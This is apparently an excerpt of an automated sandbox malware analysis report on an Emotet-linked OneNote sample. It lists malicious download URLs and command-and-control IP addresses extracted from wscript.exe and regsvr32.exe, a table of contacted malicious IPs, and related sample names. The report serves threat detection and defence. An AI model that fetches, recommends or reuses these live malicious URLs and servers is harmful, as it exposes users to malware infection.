https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM	wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bbvoyage.com/useragreem	wscript.exe, 00000001.00000002.410280537.0000000005950000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://91.121.146.47:8080/jesecsgigcdk/zfgrij/wjhswvhm/D	regsvr32.exe, 00000004.00000003.487960749.0000000000C32000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/	wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405065761.000000000599E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404449141.0000000005925000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://163.44.196.120:8080/jesecsgigcdk/zfgrij/wjhswvhm/	regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633048018.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631876075.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/D	wscript.exe, 00000001.00000003.404701229.0000000005980000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404904476.000000000598C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/	wscript.exe, wscript.exe, 00000001.00000003.401446574.0000000005854000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://softwareulike.com/cWIYxWMPkK/yM	wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://91.121.146.47:8080/	regsvr32.exe, 00000004.00000002.632774627.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://163.44.196.120:8080/	regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://160.16.142.56:8080/jesecsgigcdk/zfgrij/wjhswvhm/	regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633048018.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633400839.0000000002CEE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631327134.0000000002CEE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631876075.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://penshorn.org/admin/Ses8712iGR8du/:	wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404449141.0000000005925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402904454.00000000058C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402574325.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404512277.000000000592E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410280537.0000000005950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.403395898.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404790346.0000000005948000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404263538.000000000591E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://164.90.222.65:443/jesecsgigcdk/zfgrij/wjhswvhm/	regsvr32.exe, 00000004.00000003.631367209.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633048018.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631876075.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dllG	wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404449141.0000000005925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402904454.00000000058C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402574325.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404512277.000000000592E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.403395898.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404263538.000000000591E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.gomespontes.com.br/logs/pd/vM	wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://163.44.196.120:8080/a	regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.gomespontes.com.br/logs/pd/RPROFIN	wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402904454.00000000058C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402574325.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.403395898.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404263538.000000000591E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6	wscript.exe, 00000001.00000003.402475133.00000000057B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400788663.000000000579C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407340344.00000000057BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400134477.000000000578F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410176133.00000000057BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400415831.0000000005797000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400837362.00000000057AC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ozmeydan.com/cekici/9/xM	wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://167.172.199.165:8080/	regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://160.16.142.56:8080/jesecsgigcdk/zfgrij/wjhswvhm/~	regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://167.172.199.165:8080/jesecsgigcdk/zfgrij/wjhswvhm/	regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.gomespontes.com.br/logs/pd/RPROFII	wscript.exe, 00000001.00000003.404449141.0000000005925000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://91.121.146.47:8080/jesecsgigcdk/zfgrij/wjhswvhm/	regsvr32.exe, 00000004.00000002.632774627.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/	wscript.exe, wscript.exe, 00000001.00000003.401446574.0000000005854000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM	wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dll	wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404821142.0000000005952000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404992491.0000000005963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404790346.0000000005948000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/LE=C:	wscript.exe, 00000001.00000003.404701229.0000000005980000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404904476.000000000598C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://167.172.199.165:8080/&C	regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://penshorn.org/admin/Ses8712iGR8du/o8	wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404449141.0000000005925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402904454.00000000058C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402574325.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410244672.0000000005935000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404512277.000000000592E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.403395898.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407529090.0000000005935000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404263538.000000000591E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://penshorn.org/l	wscript.exe, 00000001.00000003.406123541.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410685138.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407893232.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395243756.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://160.16.142.56:8080/	regsvr32.exe, 00000004.00000003.631557827.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632847163.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://penshorn.org:443/admin/Ses8712iGR8du/script.createobject(	wscript.exe, 00000001.00000003.402475133.00000000057B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400788663.000000000579C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407340344.00000000057BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400134477.000000000578F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410176133.00000000057BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400415831.0000000005797000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400837362.00000000057AC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://160.16.142.56:8080/jesecsgigcdk/zfgrij/wjhswvhm/Low	regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://164.90.222.65/jesecsgigcdk/zfgrij/wjhswvhm/	regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
110.232.117.186	unknown	Australia	56038	RACKCORP-APRackCorpAU	true
103.132.242.26	unknown	India	45117	INPL-IN-APIshansNetworkIN	true
104.168.155.143	unknown	United States	54290	HOSTWINDSUS	true
79.137.35.198	unknown	France	16276	OVHFR	true
115.68.227.76	unknown	Korea Republic of	38700	SMILESERV-AS-KRSMILESERVKR	true
163.44.196.120	unknown	Singapore	135161	GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG	true
206.189.28.199	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
203.26.41.131	penshorn.org	Australia	38719	DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU	true
107.170.39.149	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
66.228.32.31	unknown	United States	63949	LINODE-APLinodeLLCUS	true
197.242.150.244	unknown	South Africa	37611	AfrihostZA	true
185.4.135.165	unknown	Greece	199246	TOPHOSTGR	true
183.111.227.137	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
45.176.232.124	unknown	Colombia	267869	CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOC	true
169.57.156.166	unknown	United States	36351	SOFTLAYERUS	true
164.68.99.3	unknown	Germany	51167	CONTABODE	true
139.59.126.41	unknown	Singapore	14061	DIGITALOCEAN-ASNUS	true
167.172.253.162	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
167.172.199.165	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
202.129.205.3	unknown	Thailand	45328	NIPA-AS-THNIPATECHNOLOGYCOLTDTH	true
147.139.166.154	unknown	United States	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
153.92.5.27	unknown	Germany	47583	AS-HOSTINGERLT	true
159.65.88.10	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
172.105.226.75	unknown	United States	63949	LINODE-APLinodeLLCUS	true
164.90.222.65	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
213.239.212.5	unknown	Germany	24940	HETZNER-ASDE	true
5.135.159.50	unknown	France	16276	OVHFR	true
186.194.240.217	unknown	Brazil	262733	NetceteraTelecomunicacoesLtdaBR	true
119.59.103.152	unknown	Thailand	56067	METRABYTE-TH453LadplacoutJorakhaebuaTH	true
159.89.202.34	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
91.121.146.47	unknown	France	16276	OVHFR	true
160.16.142.56	unknown	Japan	9370	SAKURA-BSAKURAInternetIncJP	true
201.94.166.162	unknown	Brazil	28573	CLAROSABR	true
91.207.28.33	unknown	Kyrgyzstan	39819	PROHOSTKG	true
103.75.201.2	unknown	Thailand	133496	CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH	true
103.43.75.120	unknown	Japan	20473	AS-CHOOPAUS	true
188.44.20.25	unknown	Macedonia	57374	GIV-ASMK	true
45.235.8.30	unknown	Brazil	267405	WIKINETTELECOMUNICACOESBR	true
153.126.146.25	unknown	Japan	7684	SAKURA-ASAKURAInternetIncJP	true
72.15.201.15	unknown	United States	13649	ASN-VINSUS	true
187.63.160.88	unknown	Brazil	28169	BITCOMPROVEDORDESERVICOSDEINTERNETLTDABR	true
82.223.21.224	unknown	Spain	8560	ONEANDONE-ASBrauerstrasse48DE	true
173.212.193.249	unknown	Germany	51167	CONTABODE	true
95.217.221.146	unknown	Germany	24940	HETZNER-ASDE	true
149.56.131.28	unknown	Canada	16276	OVHFR	true
182.162.143.56	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
1.234.2.232	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
129.232.188.93	unknown	South Africa	37153	xneeloZA	true
94.23.45.86	unknown	France	16276	OVHFR	true

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	828491
Start date and time:	2023-03-17 09:08:34 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	Insight_Medical_Publishing.one
Detection:	MAL
Classification:	mal100.troj.expl.evad.winONE@9/11@1/49
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 50.2% (good quality ratio 42.4%) Quality average: 60.5% Quality standard deviation: 35.6%
HCA Information:	Successful, ratio: 89% Number of executed functions: 19 Number of non-executed functions: 136
Cookbook Comments:	Found application associated with file extension: .one

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
Excluded IPs from analysis (whitelisted): 13.107.4.50
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:10:16	API Interceptor	2x Sleep call for process: wscript.exe modified
09:10:54	API Interceptor	9x Sleep call for process: regsvr32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
110.232.117.186	OMICS.one	Get hash	malicious	Emotet	Browse
	OPAST_GROUP_1.one	Get hash	malicious	Emotet	Browse
	OPAST_GROUP_LLC.one	Get hash	malicious	Emotet	Browse
	OPAST_GROUP.one	Get hash	malicious	Emotet	Browse
	Opast_International.one	Get hash	malicious	Emotet	Browse
	opastonline.com.one	Get hash	malicious	Emotet	Browse
	Opast_Publishing_Group_1.one	Get hash	malicious	Emotet	Browse
	Opast_Publishing_Group.one	Get hash	malicious	Emotet	Browse
	omicsonline.net.one	Get hash	malicious	Emotet	Browse
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse
	2023-03-16_0923.one	Get hash	malicious	Emotet	Browse
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse
	100935929722734787.one	Get hash	malicious	Emotet	Browse
	NG7553084292252526_202303161746.one	Get hash	malicious	Emotet	Browse
	2023-03-16_1753.one	Get hash	malicious	Emotet	Browse
	PUV026949243199756981_202303161748.one	Get hash	malicious	Emotet	Browse
	355444649229343017.one	Get hash	malicious	Emotet	Browse
	2961883463791890566.one	Get hash	malicious	Emotet	Browse
	1002112025749539431938.one	Get hash	malicious	Emotet	Browse
	Dokumente_2023.16.03_1155.one	Get hash	malicious	Emotet	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
penshorn.org	OMICS.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	OPAST_GROUP_1.one	Get hash	malicious	Emotet	Browse	203.26.41.131
